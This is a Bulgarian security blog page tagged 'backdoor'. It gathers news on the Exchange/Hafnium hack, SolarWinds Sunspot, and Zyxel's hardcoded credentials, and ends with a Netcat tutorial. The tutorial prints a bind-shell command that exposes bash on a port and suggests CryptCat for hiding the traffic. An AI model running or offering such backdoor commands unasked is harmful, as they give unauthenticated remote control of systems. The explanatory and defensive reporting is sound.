backdoor

Хакът, който в началото на 2021 г. засегна десетки хиляди клиенти на Microsoft Exchange Server по целия свят, остави множества задни врати (backdoor) в компрометираните системи. Смята се, че зад атаката стои група, финансирана от китайското правителство, наречена Hafnium.

Голяма част от компаниите и организациите вече са закърпили уязвимостите, но все още съществуват заразени устройства. Те могат да бъдат експлоатирани с цел провеждане на последващи атаки.

Затова Федералното бюро за разследвания (ФБР) на САЩ е издействало съдебно разрешение за извършване на отдалечена операция по премахване на злонамерения софтуер.

Агенцията използва именно същите web shells / backdoors, за да проникне отдалечено в незащитени устройства и да изтрие малуера от тях. Смята се, че това ще предотврати ескалиране на постоянен, неоторизиран достъп до мрежата.

Последен ъпдейт на 24 март 2021 в 09:00 ч.

В началото на март 2021 Microsoft пусна ъпдейт за Exchange Server, който коригира четири zero-day уязвимости.

Оттогава обаче специалисти по сигурността наблюдават още по-засилена (дори автоматизирана) кампания по тяхното експлоатиране, която може да бъде използвана за последващо внедряването на рансъмуер и кражба на данни. Ако до момента не сте приложили ъпдейта, потенциално сте застрашени.

Имайте предвид, че актуализацията ще коригира само уязвимостите на Exchange Server. Но ако вече сте компрометирани, ще трябва да премахнете задната врата (backdoor), която хакерите поставят, за да получат администраторски достъп до системата ви.

Microsoft изрично разясни, че тези експлойти нямат нищо общо със SolarWinds. Все пак, хакерската атака се разглежда като втората голяма криза в киберсигурността, идваща само месеци след като руски хакери поразиха девет федерални агенции на САЩ и стотици компании по целия свят.

Смята се, че зад атаката стои група, финансирана от китайското правителство, наречена Hafnium.

Европейският банков орган (ЕБО) е сред най-скорошните жертви, които заявиха, че достъпът до лични данни чрез имейли, съхранявани на неговия Microsoft Exchange Server, може да е бил нарушен.

Досега са станали известни поне 60 хил. жертви в световен мащаб. Само в САЩ хакерите са проникнали в поне 30 хил. организации, използващи Exchange за обработка на имейли вкл. полицейски управления, болници, местни държавни структури, банки, телекомуникационни доставчици и др.

Препоръки:

1. Инсталирайте незабавно наличния ъпдейт, ако не сте го направили до момента
2. Когато не е възможно се инсталирате критичните актуализации на Microsoft Exchange, блокирайтет достъпа на недоверени връзки до порт 443; същевременно конфигурирайте вашия Exchange Server така, че достъпът до него да става само дистанционно, чрез VPN
3. Следете внимателно за злонамерена дейност, ако се съмнявате, че може да сте засегнати
4. Ако вече сте засегнати, може да използвате инструмента на Microsoft за смекчаване на негативните последици
5. Изключете Exchange Server и го възстановете отново
6. Обърнете се към специалист по киберсигурност за помощ, ако се затруднявате
7. Преминете към облачната услуга, която не е засегната от уязвимостите

Последен ъпдейт на 16 януари 2021 в 03:53 ч.

Експлоатирането на уязвимости срещу платформата на SolarWinds – Orion, използванo в компрометирането на американското правителство, продължава да разширява мащаба си. Поредното развитие по казуса е открито от компанията за киберсигурност CrowdStrike – става въпрос за уязвимост, озаглавена Sunspot.

Благодарение на нея, хакерите могат да инжектират backdoor в платформата Orion на SolarWinds. Този зловреден код наблюдава изпълняваните системни процеси и замества един от изходните файлове със друг зловреден софтуер – SUNBURST. Част от функционалността на Sunspot е включването на защити, които да попречат присъствието му да бъде разкрито и да гарантират успеха на „мисията“ му.

Към момента общият брой на известните жертви на уязвимостите в Orion вече е над 18 хил. Сред тях са редица американски правителствени агенции.

“Щамът” на Sunspot не е непознат на разследващите supply chain атаката. До момента той е наричан по-различен начин от различните киберизследователи – StellarParticle (от CrowdStrike), UNC2452 (от FireEye) и Dark Halo (от Volexity).

Sunspot е поредният злонамерен софтуер, свързан с най-големия киберпробив от години. До момента станаха известни:

• Sunburst, инсталирал троянски кон в платформата Орион по време на автоматична актуализация
• Teardrop, използван за инсталиране на софтуерно устройство за навигация (Cobalt Strike beacon)
• SuperNova, внедрен като DLL файл, който позволява на атакуващите да изпращат, компилират и изпълняват C# код от разстояние

Самоличността на хакерите на SolarWinds все още не е разкрита. Въпреки това Kaspersky направи връзка с известна по-рано група за кибершпионаж. Установи, че задната врата на Sunburst има припокривания на функции с Kazuar.NET backdoor, обвързан условно с руската хакерска група Turla.

Разбира се, възможно е нападателите да са били „вдъхновени“ от кода на Kazuar или и двете групи да са получили своя зловреден софтуер от един и същ източник или пък кодът да е използван в атаката специално, за да обвини Turla и да замеси Москва…

Междувременно, ФБР също разследва предполагаема руска следа в атаката срещу американското правителство.

Над 100 хил. Zyxel защитни стени (firewalls), VPN маршрутизатори и контролери са потенциално уязвими, тъй като във фърмуера им се съдържат потребителско име и парола, осигуряващи администраторски достъп.

Тази предефинирана функционалност може да бъде използвана от хакери като backdoor за достъп до засегнатите устройства, чрез SSH интерфейса или чрез панела за уеб администриране.

От Zyxel заявяват, че използват “hardcoded” потребител и парола, за да доставят автоматични актуализации на фърмуера на някои от устройствата си чрез FTP.

Компанията пусна ZLD V4.60 Patch 1, за премахване на вградените креденшъли в уязвими ATP, USG, USG Flex и VPN устройства и обяви, че тези с по-ранен фърмуер или SD-OS не са засегнати.

Уязвимостите на VPN устройствата са изключително опасни, тъй като те могат да се използват за създаване на нови VPN акаунти. Чрез тях злонамерени лица могат да получат достъп до вътрешната ви мрежа или да създадат правила за пренасочване на портове, за да направят вътрешните ви услуги обществено достъпни.

Този тип уязвимости се използват за последващо инжектиране на рансъмуер или компрометиране на вътрешни корпоративни мрежи и кражба на данни от тях.

Повече за това как престъпниците експлоатират вградени в устройствата уязвимости може да прочетете ТУК.

Последен ъпдейт на 28 юни 2018 в 11:29 ч.

Като системни администратори или специалисти по информационна сигурност, на всеки от нас най-вероятно му се е налагало да използва инструмента за дебъгинг Netcat. Нека все пак си припомним какви са функциите му и как може да бъде използван:

Netcat е един много добре разработен инструмент, които може да изпраща или получава информация посредством TCP или UDP протоколи. Има възможност да работи както като сървър, така и като клиент, за да трансферира файлове, да отваря backdoor shell в системата, да служи за сканиране или пренасочване на портове и дори като чат сървър/клиент.

Нека дадем и нагледен пример с това, как можем да отворим отдалечен backdoor към машина. За целта ще изпълним следната команда върху машината, която искаме да достъпим.

nc -l -p 2000 -e /bin/bash

С тази команда приложението се стартира в „сървърен“ режим, като отваря порт 2000 за достъп и изпълнява командния шел BASH.

Следващата стъпка е да изпълним следната команда върху друга машина:

nc <remote ip address> 2000

Така на практика ние си отворихме backdoor на порт 2000, през който можем да изпълняваме BASH Shell команди върху отдалечената машина.

Дотук всички сме съгласни, че инструментът може да бъде много полезен и широко използван в ежедневните ни задачи.

Като специалисти по информационна сигурност, може би някой от вас вече са се запитали „Какво става с трафика, които генерираме? Има ли начин да бъде проследен?“

Отговорът е ДА.

Трафикът който генерира NetCat е некриптиран и с инструмент като wireshark, лесно може да бъде „прослушан“. Оставяме на вас да направите експеримент и след като стартирате гореописаната команда, да изследвате комуникацията с любимия си инструмент за мрежово проследяване на трафик.

Какво е решението, ако искаме комуникацията ни с NetCat да е криптирана?

Тук на помощ идва CryptCat.

CryptCat е същия инструмент, но с добавена възможност за криптиране на комуникацията с Two-Fish алгоритъм.

Опитайте сега същата опитна постановка, но използвайки CryptCat. Резултатът е различен нали? ;)

Бъдете винаги в крак с новините от света на информационната сигурност – станете наши фенове във Facebook.